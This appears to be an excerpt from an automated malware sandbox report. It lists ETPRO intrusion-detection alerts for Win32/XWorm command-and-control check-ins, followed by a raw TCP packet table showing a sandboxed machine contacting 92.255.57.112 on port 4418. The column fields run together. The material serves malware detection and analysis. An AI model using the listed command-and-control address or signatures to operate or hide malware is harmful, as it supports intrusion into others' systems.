                                          2025-01-14T08:28:42.973564+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:42.984115+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:43.095818+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:43.098048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:44.925973+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:48.630200+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:48.632500+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:54.584189+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:54.586259+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:56.224582+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:56.481043+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:28:59.397393+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:28:59.411702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.286476+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.288599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.408688+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.410806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.534909+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:10.536690+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.654485+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.659497+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.775817+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:10.785619+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:14.930046+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:20.787767+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:21.005626+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:21.007583+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:21.127308+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:21.131335+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:26.505737+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:26.510277+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:34.036600+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:34.040662+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:37.114630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:37.116024+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:37.722426+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:37.739551+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:39.411657+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:39.415353+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:44.932971+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:51.180581+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:51.250458+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:29:53.588912+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:29:53.591335+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:00.926930+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:00.932702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:02.051886+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:02.053255+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:02.201358+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:02.202639+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:13.305969+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:13.307925+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:15.214395+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:21.148508+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:21.244123+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:22.589673+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:22.591934+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:22.980738+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:22.984877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.505065+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.506877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.628001+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.629443+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.749463+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.750818+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:28.871836+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:28.873138+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:33.927249+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:33.929262+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:44.927199+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:44.929510+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:45.048649+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:45.180503+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:45.185470+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:30:56.914325+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:30:56.916244+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:00.770510+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:00.774964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:06.161472+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:06.163091+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:07.568542+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:07.570003+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:09.051997+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:09.053540+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:14.979305+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.724496+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.726844+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:16.846847+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:16.848458+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:22.178348+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:22.187059+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:27.083048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:27.084367+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP
                                          2025-01-14T08:31:29.286494+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1124418192.168.2.649714TCP
                                          2025-01-14T08:31:29.287318+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.64971492.255.57.1124418TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jan 14, 2025 08:27:28.522505045 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:28.527426004 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:28.527503967 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:28.662579060 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:28.667395115 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:39.856349945 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:39.861176968 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:40.073057890 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:40.115591049 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:40.116270065 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:40.121114969 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:44.937259912 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:44.987927914 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:51.038036108 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:51.042889118 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:51.255163908 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:51.257204056 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:27:51.264622927 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:27:53.654355049 CET6416853192.168.2.6162.159.36.2
                                          Jan 14, 2025 08:27:53.659220934 CET5364168162.159.36.2192.168.2.6
                                          Jan 14, 2025 08:27:53.659300089 CET6416853192.168.2.6162.159.36.2
                                          Jan 14, 2025 08:27:53.664166927 CET5364168162.159.36.2192.168.2.6
                                          Jan 14, 2025 08:27:54.117125034 CET6416853192.168.2.6162.159.36.2
                                          Jan 14, 2025 08:27:54.122241974 CET5364168162.159.36.2192.168.2.6
                                          Jan 14, 2025 08:27:54.122284889 CET6416853192.168.2.6162.159.36.2
                                          Jan 14, 2025 08:28:02.225349903 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:02.230293989 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:02.442476034 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:02.445368052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:02.450201035 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:13.412805080 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:13.417735100 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:13.635190010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:13.637234926 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:13.642129898 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:14.956835032 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:15.006187916 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:24.600586891 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:24.605521917 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:24.817914009 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:24.820770025 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:24.825716019 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:35.787689924 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:35.792768002 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:36.005064011 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:36.007395029 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:36.012223959 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:36.272273064 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:36.277132034 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:36.489510059 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:36.491595030 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:36.496515989 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:37.055706978 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:37.060592890 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:37.296155930 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:37.308759928 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:37.313813925 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:38.131824970 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:38.136744022 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:38.348994017 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:38.351280928 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:38.357911110 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:41.818912983 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:41.823828936 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.036211014 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.039659977 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:42.044616938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.756669044 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:42.764537096 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.787698984 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:42.793225050 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.973563910 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:42.984114885 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:42.988985062 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:43.095818043 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:43.098047972 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:43.102890015 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:44.925972939 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:44.974931955 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:48.413074970 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:48.417943001 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:48.630199909 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:48.632499933 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:48.637501001 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:54.366735935 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:54.371671915 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:54.584188938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:54.586258888 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:54.591059923 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:56.007085085 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:56.012336016 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:56.224581957 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:56.271815062 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:56.481043100 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:56.485958099 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:59.180643082 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:59.185565948 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:59.397392988 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:28:59.411701918 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:28:59.416574955 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.069139004 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.073988914 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.179419994 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.184365034 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.194319963 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.199208975 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.209624052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.214529991 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.256639004 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.261451006 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.286475897 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.288599014 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.336863995 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.337042093 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.341928005 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.350189924 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.355092049 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.366161108 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.371154070 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.381735086 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.386665106 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.408688068 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.410805941 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.460910082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.534909010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.536689997 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.541541100 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.652679920 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.654484987 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.659440994 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.659497023 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.664335966 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.773665905 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.775816917 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.780690908 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.780742884 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.785563946 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.785619020 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.790450096 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:14.930046082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:14.974946022 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.787766933 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.792623043 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:20.834606886 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.840229988 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.005625963 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.007582903 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:21.012453079 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.127307892 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.131335020 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:21.136183023 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.287770987 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:26.292613983 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.505737066 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.510277033 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:26.515146971 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:33.819051981 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:33.824090958 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:34.036600113 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:34.040662050 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:34.045600891 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:36.897229910 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:36.902200937 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.114629984 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.116024017 CET497144418192.168.2.692.255.57.112
